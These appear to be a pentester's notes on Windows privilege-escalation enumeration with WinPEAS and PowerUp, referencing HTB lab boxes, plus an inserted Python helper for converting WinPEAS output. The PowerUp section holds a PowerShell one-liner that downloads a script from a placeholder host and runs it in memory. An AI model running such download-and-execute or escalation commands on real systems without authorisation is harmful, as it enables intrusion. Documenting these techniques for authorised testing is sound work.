Enumeration

Manual Enumeration

Get OS version:

systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

Get service pack version:

wmic os get servicepackmajorversion

Automatic Enumeration

WinPEAS

Great Windows privesc enumeration script.

If you transfer the results from running the script to Linux, you can view the colourised output with the cat command. Vim doesn't colourise it properly.

To view it with other tools, you have to convert it to UTF-8 first.

iconv -f utf-16le -t utf-8 winpeas.txt -o winpeas-utf-8.txt

After that, you can view it with less (ansi coloured output).

less -R winpeas-utf-8.txt
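The same conversion as a small helper, added here as an example and not part of WinPEAS or this page's original commands: it decodes the UTF-16LE report (dropping the BOM), optionally strips the ANSI colour escapes so the text can be grepped or opened in tools that understand neither, and does a case-insensitive line search (for example, for the autologon entries mentioned below). The sample bytes are constructed, not real WinPEAS output.

```python
import re
import sys
from typing import List

# WinPEAS writes UTF-16LE text (usually with a BOM) that also carries ANSI
# colour escape sequences. Decode it and optionally strip the escapes so the
# report can be grepped or opened in tools that handle neither.
ANSI_CSI = re.compile(r"\x1b\[[0-9;?]*[ -/]*[@-~]")

def decode_utf16le(raw: bytes) -> str:
    """Decode UTF-16LE bytes, dropping the BOM if present, and normalise CRLF."""
    if raw.startswith(b"\xff\xfe"):
        raw = raw[2:]
    return raw.decode("utf-16-le").replace("\r\n", "\n")

def strip_ansi(text: str) -> str:
    """Remove ANSI CSI sequences (colours, cursor movement) from text."""
    return ANSI_CSI.sub("", text)

def convert_winpeas(raw: bytes, keep_colour: bool = False) -> str:
    """Return the report as str; keep_colour=True keeps escapes for 'less -R'."""
    text = decode_utf16le(raw)
    return text if keep_colour else strip_ansi(text)

def grep_report(text: str, needle: str) -> List[str]:
    """Case-insensitive line search over the cleaned report (e.g. 'autologon')."""
    needle = needle.lower()
    return [line for line in text.splitlines() if needle in line.lower()]

# Constructed sample, not real WinPEAS output: BOM, a coloured heading, two lines.
SAMPLE_RAW = (
    "\ufeff"
    "\x1b[1;36m[+] Basic System Information\x1b[0m\r\n"
    "OS Name: Microsoft Windows 10 Pro\r\n"
    "\x1b[1;31mAutoLogon DefaultUserName\x1b[0m: EXAMPLE\\user\r\n"
).encode("utf-16-le")

if __name__ == "__main__":
    # Usage: python winpeas_convert.py winpeas.txt > winpeas-utf-8.txt
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_RAW
    sys.stdout.write(convert_winpeas(data))
```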

Caveats:

  • When I tested this script, it wasn't able to find autologon credentials, even though PowerUp was able to find them with Get-RegistryAutoLogon (WinPEAS checks for them but said it didn't find any in the "Bart" box on HTB)

PowerUp

This may catch some stuff that WinPEAS might not find, like autologon credentials.

Serve the script over HTTP:

python3 -m http.server 80

From PowerShell, load the module into memory:

IEX (New-Object Net.WebClient).DownloadString('http://YOUR_IP_ADDRESS_HERE/PowerUp.ps1');

Invoke all checks:

Invoke-AllChecks | Out-File -Encoding ASCII powerup.txt

Caveats:
